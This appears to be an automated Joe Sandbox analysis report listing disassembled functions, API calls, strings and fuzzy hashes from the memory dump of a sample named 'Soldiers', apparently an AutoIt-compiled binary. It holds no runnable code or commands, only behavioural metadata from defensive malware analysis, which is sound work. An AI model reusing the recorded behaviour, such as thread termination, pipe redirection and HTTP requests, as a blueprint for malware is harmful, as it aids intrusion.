                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 839392675-0
                                                          • Opcode ID: 1978c93361fe76f4da3e6ce8db43e8a7047ef8ebdb89a2dc3282de32921b4e73
                                                          • Instruction ID: 1feb6a2b7e2a4841f581bfe43d6f2259068e352eba37a2c7daaf53641bdc6dcf
                                                          • Opcode Fuzzy Hash: 1978c93361fe76f4da3e6ce8db43e8a7047ef8ebdb89a2dc3282de32921b4e73
                                                          • Instruction Fuzzy Hash: 37F06D33254158FBE3215BA29C0DEEF7A3CEBC6B11F000259FA08D1050E7A01A5196B5
                                                          Function 009477EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,?), ref: 009477FE
                                                          • EnterCriticalSection.KERNEL32(?,?,008EC2B6,?,?), ref: 0094780F
                                                          • TerminateThread.KERNEL32(00000000,000001F6,?,008EC2B6,?,?), ref: 0094781C
                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,008EC2B6,?,?), ref: 00947829
                                                            • Part of subcall function 009471F0: CloseHandle.KERNEL32(00000000,?,00947836,?,008EC2B6,?,?), ref: 009471FA
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0094783C
                                                          • LeaveCriticalSection.KERNEL32(?,?,008EC2B6,?,?), ref: 00947843
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                          • String ID:
                                                          • API String ID: 3495660284-0
                                                          • Opcode ID: bde07fcb6e11c913e456d8c67bcda044e3f030bdbd1cbbed479875641bba4145
                                                          • Instruction ID: a6be55f2365b380a8ff2128cecfc2a3427940b839d16d798a76b5fedf07cd5d4
                                                          • Opcode Fuzzy Hash: bde07fcb6e11c913e456d8c67bcda044e3f030bdbd1cbbed479875641bba4145
                                                          • Instruction Fuzzy Hash: 5CF05E3355D212EBD7212BA4EC8CEAB7729FF89302B141421F206954A1DBB55841EB60
                                                          Function 0093954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00939555
                                                          • UnloadUserProfile.USERENV(?,?), ref: 00939561
                                                          • CloseHandle.KERNEL32(?), ref: 0093956A
                                                          • CloseHandle.KERNEL32(?), ref: 00939572
                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0093957B
                                                          • HeapFree.KERNEL32(00000000), ref: 00939582
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                          • String ID:
                                                          • API String ID: 146765662-0
                                                          • Opcode ID: 46ce5a63d2b0f1fc055c3c57f5d03e29208227877147d2c7db959592cb8690ff
                                                          • Instruction ID: 1c9bf1c3f8935dd0789ab639accaf67d8880a9b2aca6e22da6ec2e1b9df3d008
                                                          • Opcode Fuzzy Hash: 46ce5a63d2b0f1fc055c3c57f5d03e29208227877147d2c7db959592cb8690ff
                                                          • Instruction Fuzzy Hash: 39E0C237018101FBDA011BE1EC0C95ABB29FBC9722B504220F21981470CB72A4A0EB50
                                                          Function 00958CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #8.OLEAUT32(?,00970980), ref: 00958CFD
                                                          • CharUpperBuffW.USER32(?,?), ref: 00958E0C
                                                          • #9.WSOCK32(?,00000001,00000000,Incorrect Parameter format,00000000), ref: 00958F84
                                                            • Part of subcall function 00947B1D: #8.OLEAUT32(00000000,?,?,0000004E,?,?,00959DBE,?,?), ref: 00947B5D
                                                            • Part of subcall function 00947B1D: #10.WSOCK32(00037269,?,?,00959DBE,?,?), ref: 00947B66
                                                            • Part of subcall function 00947B1D: #9.WSOCK32(00037269,?,00959DBE,?,?), ref: 00947B72
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                          • API String ID: 3964851224-1221869570
                                                          • Opcode ID: 1b0faedfac5d37aa09bf37e680bc19ec572322dd2ad5df641bf9e4067c83b1da
                                                          • Instruction ID: db684b65f25c2814b36d87cd052d352f74bb9835dd1572ddfb9f98b25595c44e
                                                          • Opcode Fuzzy Hash: 1b0faedfac5d37aa09bf37e680bc19ec572322dd2ad5df641bf9e4067c83b1da
                                                          • Instruction Fuzzy Hash: 77916A716043419FC710DF29C48595BBBF9EF89314F04495DF98A9B3A1DB30E909CB92
                                                          Function 0094323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008F436A: _wcscpy.LIBCMT ref: 008F438D
                                                          • _memset.LIBCMT ref: 0094332E
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0094335D
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00943410
                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0094343E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                          • String ID: 0
                                                          • API String ID: 4152858687-4108050209
                                                          • Opcode ID: 3ad484c581277f4e198f0ff3b9e9738132e41b989292750c0f17be1d584d4aab
                                                          • Instruction ID: 47829354d8b31201ed12992260c3521b54533c8f23fb510188b5afe683094735
                                                          • Opcode Fuzzy Hash: 3ad484c581277f4e198f0ff3b9e9738132e41b989292750c0f17be1d584d4aab
                                                          • Instruction Fuzzy Hash: EE51C0316183019FD7259F38C845EABBBE8AF95324F048A2DF895D31E1DB64CE448792
                                                          Function 00949B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008F4A8C: _fseek.LIBCMT ref: 008F4AA4
                                                            • Part of subcall function 00949CF1: _wcscmp.LIBCMT ref: 00949DE1
                                                            • Part of subcall function 00949CF1: _wcscmp.LIBCMT ref: 00949DF4
                                                          • _free.LIBCMT ref: 00949C5F
                                                          • _free.LIBCMT ref: 00949C66
                                                          • _free.LIBCMT ref: 00949CD1
                                                            • Part of subcall function 00902F85: HeapFree.KERNEL32(00000000,00000000,?,00909C54,00000000,00908D5D,009059C3), ref: 00902F99
                                                            • Part of subcall function 00902F85: GetLastError.KERNEL32(00000000,?,00909C54,00000000,00908D5D,009059C3), ref: 00902FAB
                                                          • _free.LIBCMT ref: 00949CD9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                          • String ID: >>>AUTOIT SCRIPT<<<
                                                          • API String ID: 1552873950-2806939583
                                                          • Opcode ID: 6344edb8c97270a386544ca26cfd94b560838f8fb40214092ea2ef9ba9464bb9
                                                          • Instruction ID: 1420ad1c41c6bae1c51d563864001ee20a16b5b8014971f7e0d00b8e0e95266f
                                                          • Opcode Fuzzy Hash: 6344edb8c97270a386544ca26cfd94b560838f8fb40214092ea2ef9ba9464bb9
                                                          • Instruction Fuzzy Hash: CC515EB1D04219AFDF24DF64DC85AAEBBB9FF48304F00049EF249A3281D7755A848F59
                                                          Function 0096DF09 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00958A0E,?,00000000), ref: 0096DF71
                                                          • SetErrorMode.KERNEL32(00000001,?,00000000,00000000,00000000,?,00958A0E,?,00000000,00000000), ref: 0096DFA7
                                                          • GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 0096DFB8
                                                          • SetErrorMode.KERNEL32(00000000,?,00000000,00000000,00000000,?,00958A0E,?,00000000,00000000), ref: 0096E03A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                          • String ID: DllGetClassObject
                                                          • API String ID: 753597075-1075368562
                                                          • Opcode ID: dc556baaf03d825c3f8d84badd984e71443d2ff089ca9ddc99984771e28fee02
                                                          • Instruction ID: 66f49a7dd3fef6eca275f9806f3436ce311e41b9c5cbebd6b5b844257dc8fbf5
                                                          • Opcode Fuzzy Hash: dc556baaf03d825c3f8d84badd984e71443d2ff089ca9ddc99984771e28fee02
                                                          • Instruction Fuzzy Hash: A5419FB6604205EFDB15CF65C984BAA7BB9EF84310F1480AAEC099F206D7F5DD44DBA0
                                                          Function 00942EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 00942F67
                                                          • GetMenuItemInfoW.USER32(00000004,?,00000000,?), ref: 00942F83
                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00942FC9
                                                          • DeleteMenu.USER32(?,?,00000000,?,00000000,00000000,009A7890,?), ref: 00943012
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Menu$Delete$InfoItem_memset
                                                          • String ID: 0
                                                          • API String ID: 1173514356-4108050209
                                                          • Opcode ID: 13b52e3fd58261c7c1ba509c2516e7989a7e30873781d8e0b0ce60a283b457c6
                                                          • Instruction ID: 6410d78b3ea472822010b8e852dc346c040c4300555f0df19fa96ce456959f8d
                                                          • Opcode Fuzzy Hash: 13b52e3fd58261c7c1ba509c2516e7989a7e30873781d8e0b0ce60a283b457c6
                                                          • Instruction Fuzzy Hash: D241B231208341AFD724DF25C884F1ABBE8FF85314F508A5EF5A597291D770EA05CB52
                                                          Function 0095DE8E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0095DEAE
                                                            • Part of subcall function 008F1462: _memmove.LIBCMT ref: 008F14B0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: BuffCharLower_memmove
                                                          • String ID: cdecl$none$stdcall$winapi
                                                          • API String ID: 3425801089-567219261
                                                          • Opcode ID: e0a01d402b962db6d5efb2e6a6d3f5c35c5b6b6ce9efae858884f7c5023a9d2c
                                                          • Instruction ID: 1a382f8ee29abe64a08c68cb50760bf936277ceac5f139ea8cb0a7c66493565b
                                                          • Opcode Fuzzy Hash: e0a01d402b962db6d5efb2e6a6d3f5c35c5b6b6ce9efae858884f7c5023a9d2c
                                                          • Instruction Fuzzy Hash: 1E319370911219EFCF10DF68C841AFEB3B8FF54314B104629ED66972D1DB31A909CB91
                                                          Function 00939A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008F1A36: _memmove.LIBCMT ref: 008F1A77
                                                            • Part of subcall function 0093B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0093B7BD
                                                          • SendMessageW.USER32(?,00000188,00000000,00000000,?,?,ListBox,?,?,ComboBox), ref: 00939ACC
                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000,?,00000188,00000000,00000000,?,?,ListBox,?,?,ComboBox), ref: 00939ADF
                                                          • SendMessageW.USER32(?,00000189,?,00000000,?,0000018A,00000000,00000000,?,00000188,00000000,00000000,?,?,ListBox,?), ref: 00939B0F
                                                            • Part of subcall function 008F1821: _memmove.LIBCMT ref: 008F185B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$_memmove$ClassName
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 365058703-1403004172
                                                          • Opcode ID: a50608703ee8a5831081e60777aa1124607c0d51918d4a9c856543f78af64f9b
                                                          • Instruction ID: 0639b0e84940c9f743eef3773bcc245eb4bca44de3e04fb6a2f3b03f10985de5
                                                          • Opcode Fuzzy Hash: a50608703ee8a5831081e60777aa1124607c0d51918d4a9c856543f78af64f9b
                                                          • Instruction Fuzzy Hash: 3821D272A00108AEDF14ABB4DC8AEFEBB7CEF85350F10421AF925D72D1DB7449459A60
                                                          Function 00951EF9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00951F18
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00951F3E
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?,00000000), ref: 00951F6E
                                                          • InternetCloseHandle.WININET(00000000,0000002A,DEADBEEF,00000000), ref: 00951FB5
                                                            • Part of subcall function 00952B4F: GetLastError.KERNEL32(?,?,00951EE3,00000000,00000000,00000001), ref: 00952B64
                                                            • Part of subcall function 00952B4F: SetEvent.KERNEL32(?,?,00951EE3,00000000,00000000,00000001), ref: 00952B79
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                          • String ID:
                                                          • API String ID: 3113390036-3916222277
                                                          • Opcode ID: c8793644082ffacb587b7d67aaa1ea98dd97e5ccf3c2613c58e04096aec906ba
                                                          • Instruction ID: 17c8dcc46fb9e471fccc69a80a101601c1f6bb8a3a374a664a45d039075aad2a
                                                          • Opcode Fuzzy Hash: c8793644082ffacb587b7d67aaa1ea98dd97e5ccf3c2613c58e04096aec906ba
                                                          • Instruction Fuzzy Hash: 9521D1B2618208BFEB11DF21CC85FBF77EDEB89746F10411AFC0996240DB249D489BA1
                                                          Function 00966A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008E2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096,?,00000096,?,008E2004), ref: 008E214F
                                                            • Part of subcall function 008E2111: GetStockObject.GDI32(00000011,00000000,?,00000096,?,008E2004,?,?,static,00970980,?,?,?,00000096,00000096,?), ref: 008E2163
                                                            • Part of subcall function 008E2111: SendMessageW.USER32(00000000,00000030,00000000,?,00000096,?,008E2004,?,?,static,00970980,?,?,?,00000096,00000096), ref: 008E216D
                                                          • SendMessageW.USER32(00000000,00000467,00000000,?,?,00000000,SysAnimate32,00000000,?,?,?,?,?,?,?,00000000), ref: 00966A86
                                                          • LoadLibraryW.KERNEL32(?), ref: 00966A8D
                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00966AA2
                                                          • DestroyWindow.USER32(?), ref: 00966AAA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                          • String ID: SysAnimate32
                                                          • API String ID: 4146253029-1011021900
                                                          • Opcode ID: ed59c51a0633b7fd16da37243960987acaeeaa4b353ee68dfda37c3c1fd15386
                                                          • Instruction ID: 8069a7a144b7ccabfc1ad0fe8bc1bda704841b536aec63a5f2f0c1d8bb5b6857
                                                          • Opcode Fuzzy Hash: ed59c51a0633b7fd16da37243960987acaeeaa4b353ee68dfda37c3c1fd15386
                                                          • Instruction Fuzzy Hash: 50218C72214205AFEF108FE4DC81EBB77ADEF99368F108619FA55A2190D371DC91A7A0
                                                          Function 00947357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 00947377
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009473AA
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 009473BC
                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 009473F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          • Opcode ID: 7a3e6a92d467b3181cde7c57c04a693b97632be10717fad090e1ef8df8d9f1bf
                                                          • Instruction ID: bf736d9a87a767b1d37906ecd1f1c673e013db04e1fc38964535c05db7759af0
                                                          • Opcode Fuzzy Hash: 7a3e6a92d467b3181cde7c57c04a693b97632be10717fad090e1ef8df8d9f1bf
                                                          • Instruction Fuzzy Hash: 4021777150830EDBDB209FA9EC45E9AB7E8AF84724F204A19FCA5D72D1D770D850EB50
                                                          Function 00947425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00947444
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00947476
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 00947487
                                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009474C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          • Opcode ID: 69f4be1785516f398c19923b1abd1cdcf0954d90264f304be19de2a804f8c7b7
                                                          • Instruction ID: 0409677e3003d513288ca634b0b69c89b94dc93b46ede5a886112b285b4fad9b
                                                          • Opcode Fuzzy Hash: 69f4be1785516f398c19923b1abd1cdcf0954d90264f304be19de2a804f8c7b7
                                                          • Instruction Fuzzy Hash: 5A21A471508309DBDB209FE89C44EAABBE9AF95730F200B19F9B0E72E0DB709850C750
                                                          Function 0094B283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          APIs
